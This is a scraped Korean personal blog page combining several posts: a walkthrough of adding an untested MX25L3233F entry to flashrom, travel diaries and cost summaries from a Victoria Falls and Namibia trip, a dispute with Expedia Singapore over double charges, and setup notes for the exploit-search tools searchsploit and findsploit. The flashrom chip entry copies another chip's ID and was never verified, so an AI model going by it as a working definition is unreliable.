참고 : https://www.flashrom.org/Development_Guidelines#Adding.2Freviewing_a_new_flash_chip

내가 만들 chip : MX25L3233F

참고 chip : MX25L3273E


git 을 통해 https://github.com/flashrom/flashrom 를 설치한다. flashrom 에서 현재 지원되지 않는 칩의 경우 추가할 수 있는데, 그 방법을 확인해보고 해보았다.


새로운 칩 정보를 넣는 방법은 아래 링크에 자세히 써있다.

https://www.flashrom.org/Development_Guidelines#Adding.2Freviewing_a_new_flash_chip


저 링크의 내용을 따라 새로운 칩 정보를 넣어본것을 아래에 정리해본다.



3. First, find the best* IDs in the datasheet (*FIXME: this needs to be explained together with the probing somewhere else in detail) and check if the ID exists in flashchips.h already

  >> #define MACRONIX_MX25L3205 0x2016 이런식으로 되어있는데, 여기서 0x2016의 의미는 데이터 시트에 보면 ID Definitions 값 중 RDID 값이 있다. 앞부분 1비트는 장비 제조사 비트, 다음 2비트가 모델 비트다. 여기에 RDID 2번째 비트 값을 의미한다.


7. We encode various features of flash chips in a bitmask named .feature_bits. The various possibilities can be found in flash.h.

  >> MX25L3273E에 FEATURE_WRSR_WREN | FEATURE_OTP,로 되어있고, DataSheet에 otp 검색하니까 있어서 똑같이넣음


8. .tested is used to indicate if the code was tested to work with real hardware, its possible values are defined in flash.h. Without any tests it should be set to TEST_UNTESTED.

  >> TEST_UNTESTED 로 설정


9. .probe indicates which function is called to fetch IDs from the chip and to compare them with the ones in .manufacture_id and .model_id. This requires some knowledge or source reading. For most SPI flash chips probe_spi_rdid is the right one if the datasheets mentions 0x9f as an identification/probing opcode.

  >> 9f 검색하니까 rdid 커맨드 지원해서 그대로 납둠


11. .block_erasers stores an array of pairs of erase functions (.block_erase) with their respective layout (.eraseblocks).

  1. .block_erase is similar to the probing function. You should at least check that the opcode named in the function name is matching the respective opcode in the datasheet.
>> 참고 chip을 보니, 20, 52, d8, 60, c7이 erase 커맨드임. 그래서 erase 커맨드 hex값을 확인했더니 같았음.

2. Two forms of .eraseblocks can be distinguished: symmetric and asymmetric layouts. Symmetric means that all blocks that can be erased by an opcode are sized equal. In that case a single range can define the whole layout (e.g. {4 * 1024, 256} means 256 blocks of 4 kB each). Asymmetric layouts on the other hand contain differently sized blocks, ordered by their base addresses (e.g. {{8 * 1024, 1}, {4 * 1024, 2}, {16 * 1024, 7}}describes a layout that starts with a single 8 kB block, followed by two 4 kB blocks and 7 16 kB blocks at the end).
      >> 지우는 사이즈를 의미함. 예로 참고하는 칩의경우 52의 경우 32K의 블록을 지우는 거니까 {32 * 1024, 128}로 되어있었음. 같은 사이즈의 칩이고, 다 같았기 때문에 그대로 둠 


12..printlock is a misnomer to some extent. It is misused not only to print (write) protected address ranges of the chip, but also to pretty print the values of the status register(s) - especially true for SPI chips. There are a lot of existing functions for that already and you should reuse one if possible. Comparing the description of the status register in the datasheet of an already supported chip with that of your chip can help to determine if you can reuse a printlock function.

  >> Block Lock Protection에 있는 정보를 비교해서 작성함. 두개의 칩이 같은 내용이 적혀있어 그대로 진행... 


13, .unlock is called before flashrom wants to modify the chip's contents to disable possible write protections. It is tightly related to the .printlock function as it tries to change some of the bits displayed by .printlock.

  >> 잘 모르겠음..ㅠㅠ 일단 그대로 둠


14. .write and .read are function pointers with the obvious meaning. Currently flashrom does only support a single function each. The one that is best supported by existing programmers should be used for now, but others should be noted in a comment if available.

  >> 참고 칩의 256이 page 단위길래 검색했더니 같음. read도 0x0b로 fastread 값이 동일함


15. .voltage defines the upper and lower bounds of the supply voltage of the chip. If there are multiple chip models with different allowed voltage ranges, the intersection should be used and an appropriate comment added.

  >> minimum, maximum 값이다. 동일함




flashchips.c 에 수정한값.



{

.vendor = "Macronix",    /*HANA*/

.name = "MX25L3233F",

.bustype = BUS_SPI,

.manufacture_id = MACRONIX_ID,

.model_id = MACRONIX_MX25L3205,

.total_size = 4096,

.page_size = 256,

/* OTP: 64B total; enter 0xB1, exit 0xC1 */

.feature_bits = FEATURE_WRSR_WREN | FEATURE_OTP,

.tested = TEST_UNTESTED,

.probe = probe_spi_rdid,

.probe_timing = TIMING_ZERO,

.block_erasers =

{

{

.eraseblocks = { {4 * 1024, 1024} },

.block_erase = spi_block_erase_20,

}, {

.eraseblocks = { {32 * 1024, 128} },

.block_erase = spi_block_erase_52,

}, {

.eraseblocks = { {64 * 1024, 64} },

.block_erase = spi_block_erase_d8,

}, {

.eraseblocks = { {4 * 1024 * 1024, 1} },

.block_erase = spi_block_erase_60,

}, {

.eraseblocks = { {4 * 1024 * 1024, 1} },

.block_erase = spi_block_erase_c7,

},

},

.printlock = spi_prettyprint_status_register_bp3_srwd,

.unlock = spi_disable_blockprotect_bp3_srwd,

.write = spi_chip_write_256,

.read = spi_chip_read, /* Fast read (0x0B) and dual I/O supported */

.voltage = {2700, 3600},

},



이렇게 해서 make 하면 됨.. 

./flashrom -p linux_spi:dev=/dev/spidev0.0 -V 


근데 -V 옵션을 주고 보면 RDID 값을 확인할 수 있는데, 0x00 0x0000 으로 출력되는걸 보니 장비 칩이랑 SPI 통신이랑 원활하게 이루어 지지 않는것같다.


./flashrom -L  하면 방금 추가한 MX25L3233F 도 볼 수 있음. 




'임베디드' 카테고리의 다른 글

ubuntu 에 searchsploit, findsploit 설치하기  (0) 2017.09.01
kali binwalk 삭제 후 다른버전 설치하기  (0) 2017.02.15
glibc 버전 확인하기  (0) 2016.03.24
lz4 latency 압축 해제하기  (0) 2015.05.14
linux shadow, passwd  (0) 2015.05.13


1. 인천 -> 홍콩 -> 요하네스버그 -> 리빙스턴







짐은 정말 간소하게 챙겼다. 기내용 21인치 캐리어에 내 베개로 사용할 라이언 바디필로우를 넣어도 텅텅 비었을 정도 ㅋㅋㅋㅋㅋㅋ
옷도 활동성 좋은 츄리닝, 나이키 운동복 위주로 챙겼다. 이건 신의 한수였음 ㅋㅋㅋ 바람이 많이 불어서 모래가 엄청나게 휘날렸기 때문!!

어쨌든, 저렇게 간단하게 짐을 싸고 장을 보러 갔다.




나미비아에서 계속 캠핑을 할 예정이었기 때문에 주로 간편하게 먹을 수 있는 음식들로 준비했다. ㅋㅋㅋㅋㅋㅋ


체크인할 때 우리의 비행 여정 중에 환승 시간이 타이트하기도 했고, 여러번 환승을 할 예정이라 수하물이 못 따라 올 경우를 대비하여 기내 수하물로만 가져갔다. 음식은 위탁 수하물로 부쳤다. ㅋㅋㅋ 음식 가방을 들고 아빠가 계속 낑낑거렸었는데 그 이유가 있었다. 위탁 수하물 무게 체크하는데 음식 가방 무게만 20KG 나와서 깜짝 놀랐던 기억이..ㅋㅋㅋㅋㅋㅋ 피난가는줄?


원래, 첫 비행 일정은 이랬다.
19:45 ~ 22:20   인천 -> 홍콩
1시간 반 대기
23:55 ~ 7:05   홍콩 -> 요하네스버그

그런데!!!!!!!!!!!지연 되어서 20:30에 출발... 어휴.. 진짜 홍콩가는 비행기 안에서 얼마나 식은땀이 났는지 모르겠다.거의 한시간이 지연되었으니, 우리에게 환승에 주어진 시간은 단 30분 !!!!!!!!!!!!!!!!!!!! 우린 `아... 우리의 아프리카 여행은 이렇게 끝나는구나. 앞으로 11일 동안 홍콩에서 여행해야하나?` 라고 생각했다 진짜 ㅋㅋㅋㅋㅋㅋㅋㅋㅋ
근데 웃기게도 한시간이 늦을 줄 알았던 비행시간이 거의 비슷하게 도착했다!!!! 한 5~6분 정도 늦었나??
암튼, 그래서 다행이도 홍콩에서 무사히 환승을 했다. 그리고 홍콩에서 내리자마자 요하네스버그로 가는 비행의 항공사인 남아프리카 에어라인에서 승무원이 우리 이름이 적힌 피켓을 들고 기다리고 있었다. 신기했다. 패키지도 아니고 ㅎㅎㅎㅎㅎㅎㅎㅎㅎ 승무원 덕분에 헤매지 않고 바로 환승수속을 했고, 요하네스버그로 가는 비행기를 잘 탈 수 있었다.


ㅋㅋㅋ 홍콩->요하네스버그로 가는 비행기는 남아프리카 항공의 SA 287 이었는데 사진에서 처럼 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ 보통의 비행기처럼 앞에 나오는 게임이라던가 영화라던가 볼 수 있는 화면이 동작하지 않았다. ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ 매우 당황... 13시간을 그냥 내리 잠만 자고 갔다... 심심해 죽는줄 알았다ㅠ_ㅠ


이름을 잘못 작성하여 걱정했던 요하네스버그->리빙스턴 항공권도 별 일 없이 무사히 도착했고, 공항 앞에서 우린 택시를 잡고 바로 숙소로 갔다. 흥정하는 사람에게 우리 호텔 주소 보여주니까 OK 하더라.
근데 내가 좀 더 돈을 아껴보겠다고 리빙스턴 도착(잠비아)으로 해서 숙소(짐바브웨)까지 가려면 택시를 세 번 타야했다.



리빙스턴 공항 -> 잠비아 국경 -> 국경과 국경 사이 -> 짐바브웨 국경 -> 숙소| 1 | 2 | 3 |


어휴.. 바보 ㅠㅠ 공항앞에서 호객행위를 하는 사람들이 많고 한사람과 일단 계약하고 나면 그 사람이 다음 택시기사(?) 를 연결해준다. 정확하게 금액은 기억이 안나 적을 수 없을 것 같다 ㅠㅠㅠ
암튼, 비자는 우리가 들어오는 날 잠비아를 거쳐서 짐바브웨를 가고 다음날 구경을 위해 또 잠비아 편으로 갈거고 나미비아로 가는 비행기는 또 짐바브웨에서 출발하는 빅토리아 폭포 공항이었기 때문에 국경을 여러번 넘어야했다. 그래서 30일인가? 정확한 날짜는 기억이 안나지만 한 번 발급하면 여러번 국경을 넘을 수 있는 비자를 선택했다.

한국에서는 UNI 비자, KAZA 비자라고 둘 다 부르는것 같은데 정식 명칭은 뭔지 모르겠다... 여권을 보면 나와있을텐데ㅠㅠ 확인하기 귀찮다... 

출발하기 전에 인터넷 검색 할 땐 발급이 일시 중지된 상태라고 나와서 걱정했는데 막상 도착해서 입국심사할 때 KAZA 비자 물어보니까 된다더라.



잠비아랑 짐바브웨 국경은 진짜 어마무시하게 허름하다 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
기대 완전 이하 




저 차 뒤에 있는 건물이 국경에 있는 출국심사? 하는 곳


그냥 원숭이들도 막 돌아다닌다. 완전 문화충격.




이건 국경과 국경 사이. 원숭이들이 엄청나게 많다.






이게 차타고 빅토리아 폭포 브릿지에서 찍은 사진!! 
우리가 빅토리아 폭포 브릿지를 가본게 이게 마지막이 될줄이야............................................................ ㅠ_ㅠ

하아...


3번 택시기사한테 빅토리아 폭포에서 하는 엑티비티 업체 아냐고 추천해달라고 했다.
그랬더니 Wild Horizons  라는 업체를 추천해주고, 바로 데려다도 줬다.

너무 친절했음!!!




빅토리아 폭포 액티비티 가격은 이랬다.



우리는 선셋 크루즈랑 짚라인, 그리고 헬리콥터 13분 이렇게 3개를 선택했다.


원래 500달러 이상이었는데, 현금으로 하겠다고 하고 이야기를 잘 해서 2사람 500달러에 맞춰서 진행했다.

액티비티에는 모두 숙소픽업이 포함되어있는 가격이다.



액티비티 예약을 모두 다 하고 3번 택시기사가 숙소로 데려다주면서, 우리에게 딜을 걸어왔다.

"너네 언제 돌아가니?"
"우리 내일 돌아가"
"그럼 내가 다시 데려다줄까? 싸게해줄게"
"OK 좋아."

대부분의 택시기사들이 이렇게 딜을 하는 것 같았다.
가격은 정확히 기억나지 않지만, 싸게했던것 같다.


숙소는 The N1 호텔이었는데 가격대비 매우 만족스러웠다.

도착하고 숙소 사진을 찍은게 없다ㅠㅠ
다음날 떠나기 전에 수영장 앞에서 아빠 사진 찍어준것밖에...



숙소에 체크인을 하다가 다른 한국인 여행객을 만났다. 그분들은 부부로 둘째 가지기 전에 여행온거라고 하셨다.

부러웠다..ㅠㅠ


그분들과는 여행 코스는 비슷한데 날짜가 달라서 ㅋㅋ 나중에 나미비아에서 만나서 맥주한잔 하기로 했다. 



첫날은 숙소에 도착하니 4시쯤 되어서 숙소 근처에 있는 햄버거 집에가서 대충 요기를 하고 선셋 크루즈를 타러 갔다.







2. 빅토리아 폭포 - 1일차(선셋 크루즈)

우리는 첫날 선셋 크루즈하고, 다음날 짚라인, 그리고 헬리콥터 13분을 하기로했다.


선셋 크루즈는 솔직히 별 기대 안했는데 너무 재미있었다.
하마도 보고 악어도 보고 ㅋㅋㅋㅋㅋㅋㅋㅋㅋ 인증샷 제대로 남겼다.












1. 빅토리아 폭포, 나미비아 여행 후기 요약

하아.. 벌써 여행 다녀온지 5개월이 넘었다. 진짜 잊지 못할 추억이 된 것 같다. 그 별이 쏟아질 것 같은 밤 조용한 캠핑장에서 모닥불을 피워놓고 밥을 해먹는 그런 기분을 언제 또 느껴볼 수 있을까? 돈이 조금만 덜 들었다면 또 가고 싶을 정도다.


어쨌든, 무사히 다녀왔고 그 여운이 이미 사라져 이성적인 지금 후기를 다시 써보려한다.

나미비아 여행, 빅토리아 폭포 여행을 준비하는 다른 사람들을 위해서 !!


<여행 후기 요약 정리> 를 하자면,

  1. 일정 : 2017.04.29 ~ 2017.05.09 , 8박 11일, 빅토리아 폭포 - 나미비아 일주

  2. 금액

    1. 항공 + 렌터카 + 가기전 예약한 숙소 4곳 (에토샤 캠핑장 2곳, 리빙스턴 1곳, 나미비아 1곳) 등 사전 결제 비용 : 3,921,255원
    2. 현지에서 사용한 금액 (카드 사용) : 2,220,079원
    3. 달러 환전 비용 : 1,131,370원

총액 : 7,272,704원 / 1인당 총액 : 3,636,352원

3. 기타 참고 할 내용

    • 가기전에 사전 결제 비용에 항공기 일정이 변경되어서 항공권이 좀 복잡하게 되었음. 취소 수수료 등이 부과됨
    • 항공권에 이름을 잘못적어서 돌아오는 날 비행기 표를 재구매해야했음. 따라서 현지에서 사용한 금액에는 나미비아(윈드후크)->남아공(요하네스버그) 가는 비행기 값이 포함됨.
    • 카드 사용할 수 있는 곳에선 무조건 카드를 사용했고 현금 사용을 최소화 하였음. 대부분 카드 사용이 가능했음.
    • 네비게이션은 Google Map을 이용함. 완전 좋음.
    • 차가 우리나라랑 반대로 있어서 렌트를 하려면 운전에 능숙한 사람이 꼭 필요함. 아빠의 경우 운전 경력이 몇 십년인데도 하루동안은 고생함. 수동 차를 빌렸는데, 운전 테스트 해보고 못미더웠는지 렌트 못해주겠다고 한 경우도 봄.

2. 실제 일정 및 결제 내역

내 이전 글에도 나와있듯 난 일정을 몇번째 바꾼건지 모르겠다ㅠ_ㅠ




실제 일정은 위와 같이 이루어졌고, 저 표에서 빨간색 숙박만 예약하고 갔고, 나머지는 다 현지에서 바로 보이는 곳 또는 추천받아서 갔다.

위 일정대로 움직이는게 어렵진 않지만, 마지막엔 꽤나 타이트한 일정이 된다.

특히 에토샤에서 스와코프문크까지의 이동은 아침부터 저녁까지 운전을 계속해야한다... 내가 운전하지도 않았지만 조수석에 앉아있던 내가 이만큼이나 힘들었는데, 운전을 계속 한 아빠는 얼마나 피곤했을까... 문득 죄송스럽네ㅠㅠ



사전 결제 상세 내역이다. 현지에서 사용한 금액은 정리를 도저히 할 수 없어서 포기했다...ㅎㅎ 시간 순서가 달라서 더 헷갈릴수도... 사실 항공 일정이 변경되지만 않았어도 중간에 수수료라던지 이런거에 아낄 수 있었지만........... 어휴 생각안할란다..

암튼, 결제 상세 내역은 여기까지.


다음엔 빅토리아 폭포, 나미비아 나눠서 사진들이랑 자세히 써볼까한다.


그전에 엑기스 사진만 모아서 만든 여행 포토북 사진을 업로드~ㅎㅎ






searchsploit은 exploitdb에서 poc들을 찾을 때 사용하는 것. 


SearchSploit URL : https://www.exploit-db.com/searchsploit/



findsploit은 metasploit + exploitDB 의 PoC들을 찾을 때 사용함.

findsploit에서는 searchsploit을 이용하여 exploitDB의 PoC들을 검색함.


FindSploit URL : https://github.com/1N3/findsploit





내 환경은 ubuntu 이고, findsploit을 설치 할 때 install.sh를 실행 한 결과 아래와 같은 화면이 출력되었다.



root@hana-ubuntu:~/tools/Findsploit# ./install.sh 

   ___ _           _           _       _ _   

  / __(_)_ __   __| |___ _ __ | | ___ (_) |_ 

 / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|

/ /   | | | | | (_| \__ \ |_) | | (_) | | |_ 

\/    |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|

                        |_|                  


+ -- --=[findsploit by 1N3

+ -- --=[https://crowdshield.com

+ -- --=[Usage: findsploit windows xp remote, etc.


 + -- --=[This script will install findsploit under /usr/share/findsploit.

패키지 목록을 읽는 중입니다... 완료

의존성 트리를 만드는 중입니다       

상태 정보를 읽는 중입니다... 완료

E: exploitdb 패키지를 찾을 수 없습니다

 + -- --=[Done!




exploitdb 패키지를 찾을 수 없습니다!!!

그래서 install.sh를 확인했더니,


apt-get 을 이용하여 exploitdb를 설치하는 것을 확인했다.


그런데, searchsploit의 설치 정보를 보면 linux의 경우 apt가 아닌 git을 이용하여 설치하도록 권장했다.


따라서 나도 apt-get이 아닌, git을 이용해서 searchsploit을 설치해야 한다.


대략적인 흐름은 다음과 같다.


1. git을 이용하여 searchsploit 설치

2. findsploit 의 searchsploit 경로 변경

3. findsploit 설치


1번은 위에 작성한 searchsploit URL에 들어가면 설치 방법이 자세하게 적혀있다.

2번은 git clone으로 다운받은 findsploit의 파일의 searchsploit 경로를 바꿔준다.

나는 아래와 같이 바꿨다.





#SEARCHSPLOIT_SCRIPT='/usr/share/exploitdb/searchsploit' # PATH TO THE EXPLOITDB SEARCH SCRIPT  

SEARCHSPLOIT_SCRIPT='/opt/exploit-database/searchsploit' # PATH TO THE EXPLOITDB SEARCH SCRIPT




그리고 정상적으로 ./install.sh을 하면 똑같은 에러 메시지가 떠도 정상적으로 구동이 된다.








'임베디드' 카테고리의 다른 글

flashrom 새로운 chip 등록하기  (0) 2018.11.30
kali binwalk 삭제 후 다른버전 설치하기  (0) 2017.02.15
glibc 버전 확인하기  (0) 2016.03.24
lz4 latency 압축 해제하기  (0) 2015.05.14
linux shadow, passwd  (0) 2015.05.13
아프리카준비2.md

1. 문제 발생 원인

초기 계획에 빅토리아 폭포를 들어가는 스케줄은 5월 7일 13시 10분에 도착해서 오후동안 보고 다음날 한국으로 가는 것이었다. 그런데 이 비행기 스케쥴이 13시 15분 출발로 변경이 되었다... 빅토리아 폭포를 구경하는 시간이 이미 짧아서 걱정이 되었었는데, 시간이 더 딜레이 되어서 전체 여행 일정이 꼬이게 되었다. 이게 나에게 큰 고통을 준 계기가 되었다.

ㅠㅠ 위에 초기 계획안이었지만 비행기 스케줄이 바뀌면서 아래 스케줄로 바꾸게 되었다.

<초기 계획안>



<변경 후 계획안>




2. 문제 발생

초기 계획에서 나는 비행기 표를 총 3번을 나눠 구매했다.

  • 인천<->홍콩<->요하네스버그 : tripsta
  • 요하네스버그->빈트후크 , 빅토리아 폭포->요하네스버그 : Expedia singapore
  • 빈트후크->빅토리아 폭포 : tripsta

바뀐건 3번째 빈트후크->빅토리아 폭포. tripsta에는 e-mail옵션을 선택했었기 때문에 스케줄 변경 메일이 왔다.

// tripsta에서 온 메일 내용

Dear Mr. Park, 

We would like to inform you that there is a schedule change by the airline company for your booking F74158795 . 

The flight from Windhoek to Victoria Falls has been changed as following:
SW 405U 07MAY Windhoek to Victoria Falls1315 1550
We kindly ask you to contact us, either by phone or email, to confirm the new flight schedule. 
If, by any chance, the new flight schedule meddles with your plans, please inform us accordingly, so we can contact the airline company and request additional alternative flights or a full refund for you. 

Please note that it is very important to receive your call or reply by 13Apr, so we can process your request on time.

Should you require any further information we can be contacted on +44 (20) 3695 4992 (standard rates), 08:00am to 06:00pm Monday to Friday and (+44) (90)1 8150100 (£0.30/min), 06:00pm to 08:00am Monday to Friday and weekends. Our passenger service center operates 24 hours a day, 7 days a week . For urgent inquiries please contact our call center. 

그래서 해당 항공권은 취소를 신청했고, Full refund를 받을 수 있었다. 만약 내가 항공권을 한번에 결제했다면(하나의 Itinerary) 모든 걸 Full refund 받을 수 있었을테지만 따로 끊었기 때문에 해당되지 않았다. 이게 내 첫 번째 실수다.

일정을 변경해서 빅토리아 폭포를 먼저 가야 했기 때문에 Expedia에서 구매했던 항공권도 변경 또는 환불이 필요했다. Expedia Singapore를 통해 구매를 했는데 Korea랑은 또 다른 별개의 사이트라고 봐야한단다. Korea를 통해서는 할 수 있는게 아무것도 없고 영어로 Singapore 지사와 연락을 해야한다.

나는 친구의 도움을 받아 Singapore에 콜센터에 전화를 했다. 변경하는데 드는 Change fee는 한 사람당 41 싱가포르달러, 취소 Cancel Fee는 한 사람당 100 싱가포르 달러라고 했다. 그래서 Change를 선택했다.


안내 받은대로라면, 2명의 Change Fee인 82 싱가포르 달러가 결제되어야 했지만 209.60 싱가포르 달러가 두 번 결제되어 총 419.2 싱가포르 달러가 결제되었다.해당 가격은 내가 알아본 변경할 비행기 표의 가격이었기 때문에 초기에는 "아, 변경하려는 비행기 2개를 모두 결제한다음 내가 기존에 결제한 금액에서 Fee 금액 제외한 나머지를 환불해주나보다." 라고 생각을 했다.

그래도 확인해보고자 하는 마음에 Expedia Singapore 콜센터에 전화를 해서 209.60 달러의 이야기를 했지만, 자기네들 시스템에는 82 싱가포르 달러만 나온다고 했다. 정상적인 것일 테니 조금 기다리라길래 한 1주일을 기다렸다.


아무리 기다려도 취소가 안되길래 이상해서 나중엔, Full operational receipt를 요구했다. 왜 209.60이 두 번 결제되었는지 알고 싶다. Full receipt를 요구했더니 "카드에 결제된 내용이 뭐냐?" 라고 묻더라. 그래서 "SAA(South African Airways)다." 라고 했더니, "그럼 SAA에 receipt 달라고해~"라고 하더라. ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ어이가 없었다.

애초에 나는, SAA에는 카드 결제 정보를 준적도 없다. 그럼 카드 결제는 Expedia Singapore를 통해서 했다는 건데 영수증을 왜 SAA에 요구해야하는지 이해할 수 없었다. 그렇지만 확인해보고자 SAA에 메일을 보냈다. "나의 Booking number는 ~~이며, 나는 Full operational receipt를 원한다."라고 했더니 답장은 "너 Booking Expedia를 통해서 했잖아. Expedia한테 요구해." 라고 왔다.


엄청 흥분했다. 이게 블로그에 쓰느라 엄청 함축된 이야기지 Expedia Singapore에 전화를 할 때마다 다른 상담사가 받았고, 매번 처음부터 내 상황에 대해 설명을 해야했다. 매우 화가나고 열받았다. 이 과정에서 나는 내가 결제한 카드인 현대카드에 전화를 했다.


나 - "209.60 싱가폴 달러가 2번 결제되었다. 상세 내역을 알 수 있는가?"

현대카드 - "SAA에 항공권을 구매했다. 빈트후크->리빙스턴으로 가는 티켓이다."

나 - "내가 결제에 동의한 내역은 82 싱가포르 달러다. 그런데 내가 동의하지 않은 금액, 항공권이 결제가 되었다. 이런 경우 어떻게 해야하나?"

현대카드 - "해외 결제 담당자랑 연결해주겠다."

나 - "알겠다."


현대카드에 전화를 하고 난 후 Expedia에 다시 전화를 했다.

나 - "너네 항공권 결제했대"

Expedia - "그게 무슨말이야? 우린 항공권 결제한 적 없어"

나 - "했대. 그리고 2번 결제됬어."

Expedia - "2번 결제되었다는거야? 결제내역 메일로 보내줘"

나 - "알겠어. 메일 보낼게"

Expedia에선 자기네들은 항공권을 결제하지 않았다고 했다. 전화로 내 이야기를 다 이해하지 못한 것 같아서 메일에 하나하나 사진을 첨부해가며 작성하다가 내가 의문을 풀게 되었따 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ

원인은 바로!!! Expedia에서 내 ticket을 2개 더 추가한 것!!!




original e-ticket에는 11111111, 2222222가 원래 없던 티켓 내용인데 changed 되면서 추가되었다. 해당 1111111과 222222는 내 현대카드 결제 내용에 나온 번호와 일치했다!!!!!


여행 시작 10일 전!! 원인은 결국 내 스스로 찾았고, Expedia에 메일로 전송했다.

그리고 전달 받은 내용은 아래와 같다.


This is in regards to extra charge on your flight booking itinerary : _________
We have checked all the details and noticed our ticketing team has charged you twice of 209.00 SGD by error, we apologize for the inconvenience caused, when making the change with our agent, your are informed that total amount for both the passenger will be 278.40SGD but you are charged 2 times 209 SGD total 418 SGD, we have processed refund of difference amount back in your card, difference amount is 139.60 SGD and it will take 5 to 6 working days to reflect in your account. If you have further queries regarding this contact our support team directly at : 65 6818 5635

후우.. Expedia가 결국 실수를 인정했다. 기나긴 여정이었다. 그런데 여기서 또 다른 문제가 발생했다 ㅋㅋㅋㅋㅋㅋㅋㅋㅋ


278.40SGD는 갑자기 뭔가??????????????????????? 내가 들은건 82SGD였는데?????????


그때부터 또 Expedia 상담사들과의 싸움이 시작되었다. 결국에 매니저와의 전화까지로 넘어갔고, 거기서 82 SGD인 change fee와 196.4 SGD는 fare fee란다. 후우.... 변경할 때 그런 말은 없었잖아!!!!!!!!!!!!!! 이게 출국 바로 전날 들은 내용이라 그냥 포기했다.



그런데..!!!!! Expedia에서 예약한 내역을 확인하다가 성과 이름이 거꾸로 되어있는 것을 확인했다. 젠장. Expedia에 연락했더니 항공사 규정에 따라 티켓을 취소하고 재 구매해야 하는데 내가 산 티켓은 환불이 불가능한 티켓이라고 한다. 그래서 새로운 티켓을 사란다. ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ 어우 짜증나. 일단 그냥 가보기로 했다.

여기까지가... 출발 전 Expedia와의 싸움이었다. 나는 아프리카로 떠나기도 전에 아프리카에 질려버렸다. 아니, Expedia에 질려버렸다. 난 절대절대절대절대절대 다신 Expedia를 이용하지 않을거다.

Expedia singapore holy shit.


아프리카준비..md

정말 미치겠다.

아프리카 여행을 가기로 마음을 먹고 찾아본지 벌써 한 달째.

힘들어 죽겠다...ㅠ_ㅠ

그래도 이런 내용을 정리 해두어야 다음에 또 가고 싶을때 조금 힘을 덜 수 있겠지??


여행 일정 : 2017.04.29 ~ 2017.05.09 (8박 11일)

여행 파트너 : 아빠..☆


1. 항공권 예매하기.

원래의 계획은 10월 추석 연휴에 친구랑 가는거였다. 그런데, 인천-요하네스버그 왕복 항공권을 찾아보니 토요일(9.30)에 출발하는 항공권은 최소 240만원... 그래도 가려고 생각하고 있었다.


그런데!!!!!! 5월 연휴에 혹시나 하고 하는 마음에 검색을 해보니, 같은 노선 인천-요하네스버그 왕복 항공권이 123만원 가량이었다. 약 100만원 차이!!!!!!! 올레!!!!! 이거다. 싶어서 바로 아빠한테 전화를 했다. "아빠, 나랑 아프리카 갈래?" 아빠의 대답은 "콜!"



예약은 tripsta 에서 했다. tripsta는 예약 취소 및 변경이 어렵기로 악명이 높더라.. 그래도 100만원이 싸니까 감수해야하는 부분이라고 생각했다. 후훗..

아빠꺼랑 내꺼를 예약하려는데, 아빠랑 카드를 다르게 하려고 내꺼부터 결제하고 다시 접속하니, 쿠키 때문인지 해당 항공권 정보가 나오지 않았다. 그래서 쿠키를 제거하고 tripsta의 kr 도메인이 아닌 co.uk (영국) 도메인으로 접속했더니, 정상적으로 같은 항공권의 정보가 나왔다. tripsta는 신용카드 결제 시 따로 서비스 금액을 붙힌다. 쳇, 싸니까로 참았다.


결국, 두 명의 총 항공권 구매에 든 비용은 2,629,929원

tripsta.kr 로 구매한 경우 EUR 유로로 결제가 되었고, tripsta.co.uk 의 경우 GBP(영국)로 결제되었다. 한국 원으로 환율 계산하면 약 10,000원 차이 정도 났다. 그건 환율에 따라 조금씩 다를듯ㅎㅎ

10월 연휴에 출발할 때 한 명의 항공권 가격으로 두 명의 항공권을 해결했다!!!!



2. 여행 루트

내가 가고 싶었던 곳은 꽃보다 청춘 에서 감명깊게 본 빅토리아 폭포에서 번지점프하기

빅토리아 폭포 번지점프 가 내 여행의 목적이었기 때문에, 꽃보다 청춘 루트를 따라가려고 했다.

나미비아-빅토리아 폭포로.. ^_^ 내 인생의 최대 실수였던 듯 싶다.



2-1. 렌트카 빌리기.

험난한 여행 계획의 시작을 알리는 렌트카 빌리기......

나는 4륜 자동차에, 텐트 용품을 한 번에 빌려주는 회사를 위주로 찾았다. 인터넷으로 검색해서 찾을 수 있는 대부분의 사이트에 Enquiry를 넣었다. 대부분의 비용은 1박에 약 NSD1,000정도였다. (나는 보통 예산 확인할 때 NSD 1는 80원으로 계산했다.) Enquiry 넣을 때 나는 편도(One-Way)를 요청했다.

그런데..... 5월 연휴가 아프리카 성수기였나보다.. 렌트카를 빌리기가 하늘의 별 따기보다 어려웠다. 거의 대부분의 렌트카 업체에게서 아래와 같은 메일을 받았다.

Dear Mrs. Park
 
 
Thank you for your rental request.
 
We are already fully booked and thus cannot forward you a quote.
 
Kindly contact the Car Rental Association of Namibia.
The email address is: caran@iway.na
 
 
Kind regards

정말 나는 패닉이었다. 약 10군데 정도에 요청을 보낸거 같은데 풀 부킹이라고 하니.. 아 어쩌면 캠핑용품+렌트카는 힘들지도 모르겠다는 생각을 했다. 그러던 중 한 군데에서는 예약이 가능하다고 왔지만, One-Way fee가 어마어마 했다. N$13,700을 요구했다.

